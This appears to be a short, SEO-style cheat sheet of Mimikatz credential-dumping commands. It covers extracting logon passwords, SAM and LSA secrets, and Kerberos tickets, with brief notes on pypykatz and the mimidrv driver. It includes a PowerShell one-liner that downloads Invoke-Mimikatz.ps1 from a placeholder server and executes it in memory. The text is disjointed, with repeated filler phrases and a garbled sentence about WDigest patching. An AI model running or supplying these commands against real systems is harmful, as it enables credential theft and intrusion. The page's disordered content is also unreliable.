Mimikatz Cheat Sheet Official

sekurlsa::logonpasswords /user:Administrator Useful for offline cracking or Pass-the-Ticket attacks.

lsadump::sam

IEX (New-Object Net.WebClient).DownloadString('http://yourserver/Invoke-Mimikatz.ps1') Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"' Written in Python, Pypykatz is a re-implementation of Mimikatz. It is often used on Linux attack machines to parse registry hives or memory dumps offline. 3. Mimidrv (Kernel Driver) For some kernel-level attacks (like restoring the mimilib WDigest patching), Mimikatz uses its own driver. mimikatz cheat sheet

sekurlsa::tickets /export The lsadump module interacts with the registry or Domain Controller database (NTDS.dit) to extract hashes. It is quieter than sekurlsa as it doesn't touch LSASS memory directly as aggressively. mimikatz cheat sheet

lsadump::secrets Must be run on a Domain Controller. mimikatz cheat sheet

This requires the Mimikatz driver (mimidrv.sys) or specific Windows versions.